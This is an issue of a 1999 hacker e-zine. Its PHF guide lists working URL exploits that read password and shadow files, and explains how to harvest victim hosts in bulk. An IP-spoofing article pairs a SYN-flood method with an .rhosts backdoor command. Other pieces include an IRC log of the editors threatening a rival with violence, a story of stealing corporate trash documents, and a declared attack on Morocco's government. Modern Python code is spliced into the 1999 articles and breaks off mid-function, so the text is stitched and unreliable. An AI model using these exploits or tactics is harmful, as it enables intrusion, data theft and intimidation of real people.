:The Discordant Opposition Journal Issue #2:
:Feb 99, Third release, http://www.Rue-the-Day.net/discordia:

::::::::::: Editor-in-Chief  :::: Rue-the-Day    :::::::::::
::::::::::: Chief-in-Editor  :::: Cronus         :::::::::::
::::::::::: Assist Editor    :::: Digital Avatar :::::::::::
::::::::::: In-House Writer  :::: Kleptic        :::::::::::
::::::::::: Hosting          :::: ethercat       :::::::::::

E-Mail discordia@Rue-the-Day.net

"There are no mere facts, only interpretations" - Nietzsche

Special thanks go out to Michael Perryman for contributions to the Gallery.

:The Discordant Opposition Journal Issue 2, February 1999. All Rights Reserved. Nothing may be reproduced in whole or part without written permission from the editors. The DoJ is made public at irregular periods, but don't worry, you won't miss us.

:This is the third issue of the DoJ, issue #2, and the Editors and staff would like to dedicate this release to the workings of eccentricMind, founder of the Discordant Knights and leader of this electronic revolution. Thanks eM.

:Contents:

File
 1 - Editorial                       : Editors
 2 - The Joys of Trashing            : Rue-the-Day
 3 - The Darkedge Incident           : Editors
 4 - The Science of Biometrics       : Cronus
 5 - The Complete Guide to PHF       : Digital Avatar
 6 - Interview with Digital Avatar   : Editors
 7 - Behind IP Spoofing              : Cronus
 8 - Ask Dr. Klep                    : Kleptic
 9 - The Viewing Public              : Audience
10 - Conclusion                      : Editors

:Editorial:

Well, here we are. Welcome back to the Famed Goldmines of The Discordant Opposition Journal. The true Underground E-Zine for the future. We managed to churn out another issue. This is the third issue, #2. Don't ask why it's number 2 and issue 3. I blame it on one of Rue's mad drinking binges. I am writing this on a Sunday afternoon. I went to bed at 7:45 this morning and got only 3 hours sleep.
Rue and myself spent 8 straight hours slouched in front of a computer screen. We took turns sitting at the computer picking through networks and stuff. In the end, it was quite uneventful but it was informative. We may do a write-up of Moroccan government security protocols in a future issue. Yes, you read right, we too are publicly announcing our distaste for Moroccan human rights. The country is so antiquated that they do not as of yet have a proper voting system. Some would say that to vote the public must be educated. But those that are undereducated would have no want to vote, thus nullifying that argument. Why should Moroccan people, who are no different to us, suffer more simply because democracy hasn't reached them yet? When freedom is threatened in Middle Eastern countries or Eastern Bloc countries the Allied forces are swift to intervene, but they have all chosen to stay well out of the Moroccan problem.

The Knights of Dynamic Discord have told the Editors that currently they are launching an information attack on the resources of Morocco and its government. They have issued this statement;

'No one deserves this and we who are able to, should fight for their rights. The Knights of Dynamic Discord hereby declare information war on the infrastructure of the Moroccan Government. All Hail Discordia !'

-Issued by Deadpool and eccentricMind.

That is the editorial for this issue. We the Editors of The DoJ hereby claim no responsibility or involvement in any KoDD actions. The conclusion has the usual junk in it about the Zine.

Thank You.
Cronus, Rue-the-Day

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Joys of Trashing: Rue-the-Day

Prologue:

Rue-the-Day and Cronus, your intrepid DoJ editors, caught momentarily in a van's headlights as they try to blend into the shadows.
The van is 'Group 4 Security' - private rent-a-cop types. Rue-the-Day and Cronus are standing in the darkness between two Microsoft buildings. The van's driver fails to notice them and continues on his rounds. The two hackers breathe a sigh of relief and start back towards the main road....

Onwards:

That night had already been eventful. Earlier on we had prowled around two other Microsoft 'campus' areas. The first had been dull, lots of CCTV cameras and bins padlocked into cages. The second area had been of greater interest. Myself and Cronus had noticed a row of bins and a dumpster in a parking lot beside a building. We peered into the dumpster and found nothing much until I noticed that one of the bins was labelled "Paper Waste Only".. Hehehe. We took the lid off the bin and started going through the blue tinted bags for documents of interest. This activity had us absorbed until we heard a key turning in a door behind us. As we turned we saw a guard trying to get the door of a nearby building open. After some fumbling he succeeded and the appropriate thing to do seemed to be to run like bloody hell. I squeezed through the gap between the dumpster and bin and tried to run. The problem was, I wasn't moving - my backpack was stuck. Cronus was understandably concerned - he was in the path of the rapidly approaching (pissed off looking) security guard. He punched my backpack through the gap and we both sprinted off carrying bags of Microsoft documents with us. We ran out into traffic, over a large mound of dirt and across a patch of wasteland before finally stopping. At the bottom of this file are some interesting extracts from our find...

Advice:

Some general things to keep in mind. Try your best to be selective when trashing; discard unnecessary stuff - it'll just weigh you down. Trashing by day or by night each has its inherent advantages and disadvantages.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Darkedge Incident: The Editors

Darkedge is an Irish guy who hangs out on Dalnet. Cronus is also Irish and also hangs out on Dalnet in roughly the same areas as Dark. Cronus had been mail bombed with an expression that Dark had yelled at him earlier after being kicked from a channel that Cronus was opped in. So Cronus went looking for Darkedge on IRC.

/whois Darkedge

gave this;

[ %%%%%%%%%%%%%%%%%%(whois info: Darkedge)%%%%%%%%%%%%%%%%%% ]
[ address ] dark@apollo.netsoc.tcd.ie
[ quote ] Dark Edge
[ channels ] @#tcdnerds #hackers_ireland
[ server ] liberty.nj.us.dal.net

Tcd.ie is Trinity College Dublin in Ireland and he was at the computer labs there in the city centre. Cronus and Rue were at Cronus's house online.

hi
<^cronus^> I had some trouble with my mail account ealrier
<^cronus^> don't suppose you know anything about it ?
ohh thats right me well thank you for your faith in me cron
<^cronus^> What ?
<^cronus^> I have no faith in you
<^cronus^> do you know about it ?
can i ask a question
<^cronus^> what ?
am i the first person that came to mind about it
<^cronus^> I have already asked 5 people today
heh just askin nope not me
<^cronus^> what wasn't you ?
mail bombing is for lamers
<^cronus^> YOU FUCKER
<^cronus^> I never fucking mentioned mail bombing
<^cronus^> you WANKER !
what else would it be
<^cronus^> could have been a virus, lack
<^cronus^> of working server
<^cronus^> anything...
jeasus
<^cronus^> you fuckin idiot you're fucked
<^cronus^> Rue has vaguely mentioned breaking of legs...
what?? fuck you ....let rue try...i have nothing to do with any shit you are saying....go blame someone else
<^cronus^> right so then
<^cronus^> will you still be in town in 15 minutes ???
what are you talking about
<^cronus^> Rue will be there in a few minutes is that ok ?
<^cronus^> he is in temple bar at the moment
<^cronus^> at a cyber cafe...
what are you on ??
<^cronus^> you got yourself into a shit storm now
are you playing a fucking joke on me??
<^cronus^> a joke ?
<^cronus^> you asked for Rue to break your legs
<^cronus^> does it sound like Rue's laughing ?

At this point, Cronus and Rue set up a Back Orifice server to bounce a connection from a cyber cafe to IRC. They had been at the BetaCafe in the City earlier that day and set it up.

[join(#hackers_ireland)] Rue-the-Day (BetaCafe@betacafe3.betacafe.ie)
[mode(#hackers_ireland)] "+o Rue-the-Day" by ChanServ
Sup All
Rue? Hi
Cronus what the fuck is going on
Hey Daxxx, Zeris ahh Darkedge
<^cronus^> Hey RUE !
what am i being blamed for??
I'm in the beta cafe in temple bar what seems to be the trouble ??

On checking where Rue was, it seemed that he wasn't simply at Cronus's house but actually in Town near Trinity College. At this point we were both beginning to laugh heartily.

[ %%%%%%%%%%%%%%%%%%(whois info: Rue-the-Day)%%%%%%%%%%%%%%%%%% ]
[ address ] BetaCafe@betacafe3.betacafe.ie
[ quote ] Rueful
[ channels ] @#hackers_ireland
[ server ] powertech.no.eu.dal.net

Im in trinity
Your in trinity ? I could be there in a minute or two...
<^cronus^> Rue is kinda protective of his friends

Darkedge was pretty scared by this stage, but the plot went on.

anyway I have to go I'll be back on later places to go, people to see
<^cronus^> cya Rue - maybe later
anyway gotta go
[signoff(#hackers_ireland)] Rue-the-Day (Quit: Gone to Trinity)
hang on rue shit

Cronus continued to talk with Darkedge in private. Rue was hysterical at this point.

<^cronus^> How long do you think Rue can walk from Temple Bar ?
<^cronus^> 5 minutes ? you think
<^cronus^> although he is very tall and walks fast
i will be here all night
<^cronus^> whats wrong ?
<^cronus^> afraid to face him ?
<^cronus^> I've meet you and your half his size....
yeah well well i have a lot of friends so
<^cronus^> alot of friends ???
<^cronus^> they won't protect you
<^cronus^> you haven't meet Rue
its a pity really see here is the thing he can throw as many punches as he wants ... i dont care
<^cronus^> the doctors will care !
<^cronus^> and who mentioned punchs
<^cronus^> its the metal bar you should worried about
he can kill me...like i give a shit
<^cronus^> I'm sure he'll try
<^cronus^> you don't care for your life ?
<^cronus^> cause niether does he !
ahh well just wish it could have been different
<^cronus^> I can't wait to see this
<^cronus^> Infact
<^cronus^> I think I'm gonna come into town
<^cronus^> and have a look at the bruises
<^cronus^> ... hehe ...
<^cronus^> Cya in about 15 minutes

Cronus quit off IRC but then came back right away, and Darkedge had already gone off. Cronus and Rue were both far from the City Centre, but Darkedge left Trinity afraid that Rue was on his way. It was never mentioned again, but at the next 2600 Meeting in the City, Darkedge pulled Cronus and Rue aside, apologised and claimed innocence. We both still laugh about the whole thing to this day. Beware.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Science of Biometrics: Cronus

Biometrics is the upcoming science of authorising people by their individual physical characteristics. Fingerprinting is the oldest and most widely used biometric. I was waiting for this file to be published by a large hacking site that will go unnamed. Each time I dropped by, it would still say "Not yet finished, check back next month". So I decided to write the article myself, and here you go.

Explanation

Passwords have been shown to be insecure time after time. It is a widely held belief that the weakest part of any security system is the password. Behind the password is a user, who is forgetful and absent-minded at the best of times.
So modern science has stepped up to the plate and offered an alternative. Biometrics is the art of recognising individuals by their unique and untransferable physical characteristics. Biometrics are by no means new. They have been around for years, but until recently the price was always a limiting factor. The US military has used them as a form of authentication since well before the Cold War. Now, however, fingerprint readers are cheap enough to be built into keyboards and mice. Biometrics are so unique that they need never be changed. They are part of you, so they can never be stolen. They are constant and effortless to use. And they are extremely safe. For example, the eye scanner from the New Jersey based company Iriscan offers odds of one in 10 to the power of 78.

The Fingerprint

It has been the practice of police and government agencies all over the globe to use the unique pattern of the fingerprint as a form of biometric. This is both cheap and easily maintained. An example of PC fingerprinting is Sony Corp.'s Puppy Logon System at www.iosoftware.com. Cheap, reliable and already in the mainstream. As the fingerprint has been in use for so long, it has proved itself as a reliable biometric and has also dropped in price.

The Hand

A handprint is simply a fingerprint on a larger scale. Hand scanners, such as the $2,150 HandKey manufactured by Recognition Systems Inc., measure the hand's geometry rather than fine skin patterns, so they're useful in places such as shop floors and manufacturing operations, where dirt and nicks could cause problems with a finger scan. As yet pretty well untested on a large scale, but still very cheap. Fairground 'Love Testers' are often based on a hand scanner, and this shows their ease of use and cheapness. There is a new technique that records the vein pattern at the back of the hand.
This technique looks promising, but it exists only in a prototype system, and no extensive tests to determine the performance of the method have been done. However, this could well become an important biometric identification method.

The Eye

A person's eye is as unique as a fingerprint and can be used to identify someone. IriScan Inc.'s namesake product keeps an eye on high-security facilities. The unique pattern of the iris of the eye is measured and compared to a database of known values. The pattern on the iris is so unique that the chance of a mix-up is infinitesimally small. IriScan is designed for physical access control, generally coming in the form of a wall-mounted reader. The system is currently in use in prisons and military facilities for its security, and the pattern matching software is currently being adapted to accommodate face recognition for future planned products. The reader, software and PC cost $6,500. IriScan can be reached at www.iriscan.com.

The Face

The ideal biometric identification method would be automatic face recognition. This is a difficult pattern recognition problem because heads can rotate and move in various ways. Pattern recognition software can be used in airports and border crossings to catch criminals and terrorists. The facial software matches distinct features of the human face to a digitally recorded copy to determine if the scanner recognises you. Very new and still quite experimental. This form of biometric can't really take into account the change of appearance caused by ageing, sickness or hair growth. Extremely complex software must be written to ensure the error level of the system is kept to a minimum. In short, not a very secure biometric. More than a dozen vendors offer facial recognition products, which can cost as little as $150 to $300 per node.

The Voice

Voice verification is by far the most socially acceptable biometric. It combines ease of use with low cost.
It has several distinct advantages over the other biometric techniques. First, it's perfect for telecommunications applications. Second, most modern PCs already have the necessary hardware. If they don't, a 16-bit sound card can be purchased for about $50, and a condenser microphone costs about $10. Voice patterns are easily recorded and digitised, but the voice changes because of the time of day, illness and background noise. This means that even though this is perhaps the most convenient biometric, it is also probably the most insecure. Taped speech has been known to defeat this medium of authentication. Hardly secure.

The Signature

Some biometric products observe hand-written signatures. The process requires a digitising tablet such as a Wacom PenPartner. Not widely used and not secure at all. The signature is as weak as a password. Only a biometric in the vaguest of senses.

The Smart Card

The biometrics of the future will possibly be packaged with smart cards. Your individual biometric data will be hard-coded into the smart card and, no matter where you are, the biometric will be able to verify that it is really you once you have your smart card.

Security

Most biometrics are quite secure, and that is why they are favoured over the antique password. But simply because it's a biometric doesn't make it secure. Anywhere that needs the level of security that comes with a biometric should do some research to ensure that they are getting a suitable type. The US military has been using many different forms of biometry for years, and this stands for its reliability and overall security. Not to be underestimated, but biometrics will become the next major obstacle for the wily hacker.
Links

Here are links to more information on Biometrics;

Security gets a facelift
http://www.zdnet.com/pcweek/reviews/1027/srbio.html

How biometric technology will fuse flesh and machine
http://www.privacy.org/pi/reports/biometric.html

Biometrics Consortium
http://www.biometrics.org/

Fight the Fingerprint
http://www.NetworkUSA.org/fingerprint.shtml

Show me some ID
http://www.zdnet.com/pcweek/news/0112/12bio.html

Biometrics Explained
http://www.ncsa.com/services/consortia/cbdc/explained.htm

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Complete Guide to PHF: Digital Avatar

1. What is PHF?

The PHF (packet handler function) white pages directory services program distributed with the NCSA httpd, versions 1.5a and earlier, and also included in the Apache distribution prior to version 1.0.5, passes unchecked newline (hex 0a) characters to the Unix shell. Unauthorised access to the server host may allow an intruder to read, modify, or destroy files. The phf program implements a form-based interface to a local CCSO Name Server. The CCSO Name Server is a white pages service used for looking up name and address information about people. With phf, a hacker can execute commands on the server host using the same user-id as the user running the "httpd" server. If "httpd" is being run as root, the hacker's commands are also run as root. He can access any file on the system that is accessible to the user-id that is running the httpd server. The phf phone book script file in the cgi-bin directory can be exploited to give a hacker the password file (/etc/passwd) on Unix systems. The phf phone book script is distributed with NCSA and Apache httpd. This default file is a sample form titled "Form for CSO PH query" and can be exploited to view files on a system.
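A log-side check for the unchecked newline described above, added here as an example (it is not from the original file and is not part of phf or the NCSA/Apache distributions): it reads NCSA/Apache common-log lines, flags requests to phf, test-cgi and nph-test-cgi whose query string carries an encoded newline or a bare shell glob, and recovers the text that would have reached the shell. The log lines below are constructed for the example.

```python
"""Scan web-server access logs for phf-style newline injection.

Added example, not code from the original article.  phf's flaw was that a
percent-encoded newline (%0a) in the query string reached /bin/sh, so the
text after it ran as a second command; test-cgi and nph-test-cgi echoed an
unquoted QUERY_STRING, so a bare "*" became a directory listing.  Both
patterns are visible in the access log, which is where this scanner looks.
"""
import re
from urllib.parse import unquote, urlsplit

# NCSA/Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+$'
)

# CGI programs the article names as abusable through the query string
SUSPECT_SCRIPTS = ("phf", "test-cgi", "nph-test-cgi")

# Constructed sample log; three probes from one host, one benign lookup,
# one glob probe, and a probe that drew a 404 (patched or phf absent).
SAMPLE_LOG = """\
10.0.0.7 - - [12/Feb/1999:02:14:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1532
10.0.0.7 - - [12/Feb/1999:02:14:09 +0000] "GET /cgi-bin/phf?Q=%0aid HTTP/1.0" 200 44
192.0.2.44 - - [12/Feb/1999:02:15:30 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 812
192.0.2.44 - - [12/Feb/1999:02:16:01 +0000] "GET /cgi-bin/test-cgi?/* HTTP/1.0" 200 2210
10.0.0.7 - - [12/Feb/1999:02:17:45 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin HTTP/1.0" 404 210
""".splitlines()


def classify(target):
    """Return (kind, detail) for a suspicious request target, else None.

    kind is "shell-injection" (detail = the command after the first newline)
    or "glob-listing" (detail = the decoded query handed to the shell).
    """
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in SUSPECT_SCRIPTS or not parts.query:
        return None
    decoded = unquote(parts.query)          # %0a -> "\n", %20 -> " "
    if script == "phf":
        if "\n" in decoded:
            # phf built a ph(1) command line; everything after the newline
            # was parsed by the shell as a separate command.
            return ("shell-injection", decoded.split("\n", 1)[1].strip())
        return None
    # test-cgi / nph-test-cgi: an unquoted "*" or "/*" is expanded by sh
    if "*" in decoded:
        return ("glob-listing", decoded)
    return None


def scan_log(lines):
    """Yield (host, time, status, finding) for each suspicious request.

    A 404 is still reported: the article notes it means the hole is patched
    or phf is absent, but the probe itself is worth knowing about.
    """
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                         # not a common-log line
        finding = classify(m.group("target"))
        if finding is not None:
            yield (m.group("host"), m.group("time"),
                   int(m.group("status")), finding)


def findings(lines):
    """Collect scan_log results into a list (convenient for callers)."""
    return list(scan_log(lines))


if __name__ == "__main__":
    for host, when, status, (kind, detail) in findings(SAMPLE_LOG):
        print(f"{when} {host} {status} {kind}: {detail!r}")
```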
The phf exploit is one of the most common ways of obtaining password files of systems on the internet.

2. How do I use PHF?

Alright. To use PHF you enter the following command line into any web browser:

http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

This takes you to the /etc/passwd file of the target computer. Neat, huh? Anything after Qalias=x%0a/bin/ is the command. You can do virtually any command. You cannot edit files though. It doesn't work.

Examples:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow   - displays the shadow file
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd   - displays the passwd file
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/              - lists the root dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin           - lists the bin dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin     - lists the bin dir and shows file permissions
/cgi-bin/phf?Q=%0aid                             - gives you the uid of nobody
/cgi-bin/phf?Q=%0a/bin/uname%20-a                - gives the operating system
/cgi-bin/phf?Q=%0apwd                            - prints the working directory
/cgi-bin/test-cgi?*                              - get all files in /cgi-bin/
/cgi-bin/test-cgi?/*                             - get all directories
/cgi-bin/nph-test-cgi?*                          - get all files in /cgi-bin/
/cgi-bin/nph-test-cgi?/*                         - get all directories
/cgi/bin/phf?Q=%0a/bin/ypcat%20passwd            - get ypcat passwd

3. What happens if it says "404 Error" or "Caught on Candid Camera"?

Well, a 404 Error indicates that the target is already patched against this hole, or that they do not have PHF on their system, among other things. If it gives you a 404, move on to a new target. Caught on Candid Camera is a small joke in a way. When you get this screen it means they have logged that you have just tried to access them via PHF. Don't worry about getting caught though. They hardly ever report it. Just don't go try the same place every time. If they are logging you then they might get a little curious after you try PHF on them 10 times. Use PHF wisely.

4. How do I find new targets?

The usual way to get new targets is to pick a country, say Japan.
Go to www.altavista.com and search for "ac.jp". This will turn up a lot of results from the academic hosts in Japan. Take each listing's address and put it before the /cgi-bin in the PHF command line. You can scan all the results quite quickly if you have two browser windows open. One contains:

http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

The other contains your AltaVista search. Simply copy the address from AltaVista and paste it over the www.target_goes_here.com in your other window. You can go through 75-100 sites quite easily. I tend to get about 1/100 hits that have a usable PHF. Don't expect anything better...

-Digital Avatar
apparitione@gmx.de

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Interview with Digital Avatar:

Shortly after the first DoJ was released we decided that we needed staff. Digital Avatar was the first. He quickly became the Assistant Editor, helping with promotion, editing and also submissions.

DoJ: How long have you been in the h/p scene ?

DA: Since about 1992. I was 13 then and I was just playing around, but it helped...

DoJ: What drew you in ?

DA: I had watched some movies here and there and had seen some things on the news. So I decided to just check a few things out. My very first impression of the scene occurred when I typed "Hacking" into Yahoo. It really is that easy.

DoJ: What particular aspects interest you ?

DA: The 'culture' of the underground. It is a vastly changing region. One day a so-called wizard can be declared lame by hundreds of people and that's that. There isn't the usual cover-up of things here on the scene. The entire style is different than the real world. It's quite interesting.

DoJ: What would you attribute to your main decision to want to learn ?
DA: Probably all the clueless and not-so-clueless people out there who are bored and want to push their computing power beyond 'normal' boundaries. Anyone can master these kinds of things... so why shouldn't you try it once, at least?

DoJ: Have you ever been caught ? or gotten close ?

DA: Yes. My ISPs have gotten mad and threatened me and cancelled my service a bunch. I try not to do anything that will land me in jail. Do I play it safe? Yes.

DoJ: Do you follow any set of morals or is the chase of knowledge more important ?

DA: I don't hack politically, racially, for pr0n, power, or anything like that. I do it to test myself. It truly is the best game there is...

DoJ: On a topical subject, what is your opinion of the current trend to attack unfavourable countries ?

DA: I think that is really the wrong thing to do. Tampering with or "destroying" the computers of unfavorable countries is not going to do any good. The people need to be changed, not the machines.

DoJ: What's the one thing you want the world to know about you ?

DA: I hate printers.

DoJ: Where and how can you be contacted ?

DA: E-Mail is the only sure way to reach me. I'm currently using apparitione@gmx.de. If I change my address and you get too stressed out then go and take a look at my page [ http://members.xoom.com/damatrix/ ] and click "contact". That will always have an address that I will be receiving at.

DoJ: Perhaps a quote to finish off with ?

DA: 'Trust No One'

Fill-in the Blanks;

Choice of Women: 'Dumb Blondes'
OS: FreeBSD on a 486
Food: Chips, Fries, Pepsi, and OJ [ not mixed ]
Music: Pop/Techno... Beck, Beastie Boys, etc
Films: Armageddon, the James Bond films...
Sites: hackernews.com, cnn.com, yahoo.com

DoJ: Anything else ? A comment to someone you don't like perhaps...

DA: I think that everyone needs to have more fun. People are too stressed out.

DoJ: Thanks Digital

DA: No problem... just get your hand off my thigh...
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Behind IP Spoofing: Cronus

IP spoofing is the art of hiding a connection behind packets that seem to come from some arbitrary source: fooling a server into thinking your connection is coming from a spoofed source. This is the means by which a trust-related attack would take place. By appearing to come from somewhere else you would be able to circumvent any form of source authentication, such as the legendary 'r' commands. I have taken the liberty of assuming that the reader has a partial knowledge of the TCP and IP protocols, but if you don't there are references to some essential reading at the end. The one serious drawback to IP spoofing trust-related exploits is that the initial attack is blind. Since you are impersonating another server, you will be unable to accept any response from the server under attack.

Establishing a Connection

The TCP protocol is technically defined as a protocol developed to allow co-operating computers to share resources across a network. In other words, to share a connection to transfer data. TCP is the most widely used connection-oriented transport protocol in the TCP/IP suite. This basically means that the two hosts involved must both first establish a connection through a 3-way handshake. All the 3-way handshake does is set up the routines to transfer data. Sequence numbers of both hosts are exchanged so that a connection can be created. This 3-way handshake makes TCP harder to spoof than simple IP packets. The connection handshake is as follows;

X ---SYN---> Y
X <--SYN/ACK-- Y
X ---ACK---> Y

To begin with, host X sends an IP packet with the SYN flag to Y. This tells host Y that a connection is about to be set up. The sequence number that X sends will now be set as the ISN (initial sequence number) for future communication.
Host Y next replies with its own ISN, with the SYN flag on and an ACK flag. The ACK flag acknowledges X's first packet with its ISN plus one. X then ACKs the other host's ISN and communication can take place.

The Sequence Number

TCP is marketed as the reliable internet protocol. It accounts for all packets, resends lost packets and rearranges out-of-order data. The sequence number is used so that the other host can acknowledge receipt of the packet. The receiving end uses the sequence number to ensure proper ordering of the data and to eliminate duplicate data bytes. Sequence numbers are simply 32-bit variables. They range from 0 to 4,294,967,295. Each packet sent across a TCP connection is sequenced. TCP uses the concept of window advertisement for flow control. The sliding window tells the other end of the connection how much data can be buffered; the window size is 16 bits, so a receiving host can advertise up to a maximum of 65535 bytes. This process can be thought of as a means to ensure that neither host begins to transmit above the acceptable level of the other host.

In order to spoof a connection, you must understand how sequence numbers are chosen and how they change throughout the connection. The sequence number when a host is first booted is set to 1. The initial sequence number is incremented by 128,000 every second. This causes the 32-bit ISN variable to wrap every 9.32 hours if no connections occur. But whenever a connection attempt is issued the ISN jumps by 64,000. This process is there to eliminate the possible problem that data from an old connection could arrive and damage the current connection. This is why random sequence numbers are not used. There would be no way to guarantee that arriving data would have a different sequence number from stray data that finally freed itself from a routing loop somewhere.

Other Flags

TCP header flags include RST (reset), PSH (push) and FIN (finish).
The RST flag causes the connection to be immediately torn down. The RST flag is basically an in-built error message for when one host breaks the already established rules of the connection. The PSH flag tells the receiver to send all the queued data as soon as possible. The FIN flag is the means whereby a host naturally closes a connection.

Syn Flooding

Once the trusted host is found, it must be disabled. Since the attack intends to impersonate it, it is necessary to make sure that the host cannot receive any extra network traffic. If it got the TCP packets from the target host, it would send a packet to close the connection, thinking it was an error. The best way to deny packets access to a server is to lock it up with some form of Denial of Service attack. This is quite a complex operation and requires much research. We have seen above how TCP connections are created, and these steps to creating a connection can be used to the disadvantage of the trusted host. A Syn flood is a flood of specially crafted packets with the Syn flag marked from a random source. The trusted host picks up the packet and thinks that a connection is about to be made and sets up the appropriate service. By flooding the trusted server with random Syn packets it is possible to fill up the process table and leave no more room for new incoming packets. As the connections time out while the trusted server waits for confirmation of the connection, it is necessary to fill the gap that is left. The attacker can send multiple Syn packets every few seconds to the trusted host and keep it occupied. For more information on this complex subject see the notes at the end of the file.

The Attack

To use IP spoofing as an attack you must first choose a target and work out a trust relationship that exists on that server. The sequence numbers are calculated. The trusted server is put into a continual Denial of Service attack and then impersonated.
The attacker then simply issues a command to give him/her a way back in. Here is a step by step outline of the attack;

X(forged as Z) ---SYN---> Y
Z <--SYN/ACK-- Y
X(forged as Z) ---ACK---> Y
X(forged as Z) ---PSH---> Y

The first packet from the attacker has the source IP address spoofed as Z, which is the trusted host. Y responds with an Ack of the first packet to Z, but since the trusted host Z is in the middle of a storm of Syn packets it does not receive the Ack packet. The attacker must pause for a moment so that the target host Y actually has time to send the Ack packet. Then X sends its own Ack packet with the presumed sequence number plus one, since it is the second Ack. If the calculated sequence number is correct then by the last stage the target host believes it is connected to the trusted host Z and data can be sent. Since the attack is blind, the general idea once the trust has been exploited is to insert a backdoor into the system. The simplest could be 'cat + + >> ~/.rhosts'. This is a good idea because it is quick, allows for simple re-entry, and is not interactive. Remember the attacker cannot see any traffic coming from the target, so any responses are sent off into oblivion.

Summary

IP spoofing is not difficult because IP is easily forged. This attack works because many network connections rely on source authentication. The presumption is that source authentication is easy and safe. But it is most definitely not the latter. The most difficult part of this attack is the sequence number calculation. This takes timing, skill and guesswork.
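To make the sequence-number argument concrete, here is an added simulation (not code from the original file): host Y from the diagrams above answers a SYN with its ISN and completes the handshake only when the third packet acknowledges ISN plus one, and two ISN generators are compared, the clock-driven one described in this file (start at 1, +128,000 per second, +64,000 per connection) and an RFC 1948 style one that adds a keyed hash of the connection 4-tuple so that one peer's SYN/ACK says nothing about another peer's ISN. Time is simulated; addresses, ports and the secret key are constructed.

```python
"""TCP three-way handshake simulator with two ISN policies.

Added example, not code from the original article.  Host Y is a minimal
state machine: SYN -> SYN/ACK carrying Y's ISN; the connection is only
ESTABLISHED if the third packet acknowledges exactly ISN+1, otherwise Y
sends RST (the in-built error message the article describes).  No real
packets are sent; everything is computed in memory.
"""
import hashlib
import hmac

MOD = 2 ** 32           # sequence numbers are 32-bit
CLOCK_RATE = 128_000    # ISN increment per second (figure from the article)
CONN_JUMP = 64_000      # extra increment per connection attempt (article)


def wrap_period_hours():
    """Seconds for the clock alone to wrap 32 bits, in hours: about 9.32."""
    return MOD / CLOCK_RATE / 3600


def legacy_isn(uptime_s, connections, four_tuple=None, secret=None):
    """ISN as the article describes it: a function of uptime and the
    number of connections so far only, so every peer sees the same series."""
    return (1 + CLOCK_RATE * uptime_s + CONN_JUMP * connections) % MOD


def rfc1948_isn(uptime_s, connections, four_tuple, secret):
    """RFC 1948 style: the same clock plus a keyed hash of
    (local ip, local port, remote ip, remote port).  Each peer gets its own
    unrelated offset, so an ISN seen on one connection does not carry over."""
    msg = "|".join(str(x) for x in four_tuple).encode()
    f = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")
    return (legacy_isn(uptime_s, connections) + f) % MOD


class HostY:
    """The server side (host Y) of the handshake in the article."""

    def __init__(self, ip, port, isn_policy, secret=b"constructed-secret"):
        self.ip, self.port = ip, port
        self.isn_policy = isn_policy
        self.secret = secret
        self.uptime_s = 0
        self.connections = 0
        self.half_open = {}        # (peer ip, peer port) -> our ISN
        self.established = set()
        self.resets = 0

    def tick(self, seconds):
        """Advance the simulated clock."""
        self.uptime_s += seconds

    def on_syn(self, src_ip, src_port, peer_seq):
        """SYN from X: record the half-open connection, reply SYN/ACK."""
        four_tuple = (self.ip, self.port, src_ip, src_port)
        isn = self.isn_policy(self.uptime_s, self.connections,
                              four_tuple, self.secret)
        self.connections += 1
        self.half_open[(src_ip, src_port)] = isn
        return {"flags": "SYN/ACK", "seq": isn, "ack": (peer_seq + 1) % MOD}

    def on_ack(self, src_ip, src_port, ack):
        """Third packet: accept only if it acknowledges our ISN + 1."""
        key = (src_ip, src_port)
        isn = self.half_open.get(key)
        if isn is None or ack != (isn + 1) % MOD:
            self.resets += 1           # rules of the connection broken
            return {"flags": "RST"}
        del self.half_open[key]
        self.established.add(key)
        return {"flags": "ESTABLISHED"}


def handshake(y, x_ip, x_port=1023, x_isn=5000):
    """Normal X <-> Y handshake: X sees the SYN/ACK and acks ISN + 1."""
    synack = y.on_syn(x_ip, x_port, x_isn)
    return y.on_ack(x_ip, x_port, (synack["seq"] + 1) % MOD)["flags"]


def isn_leaks_across_peers(policy):
    """Auditor's check: does the ISN handed to one peer fix the ISN handed
    to a different peer on the very next connection?  With the legacy
    scheme the gap is exactly CONN_JUMP; with RFC 1948 it is not."""
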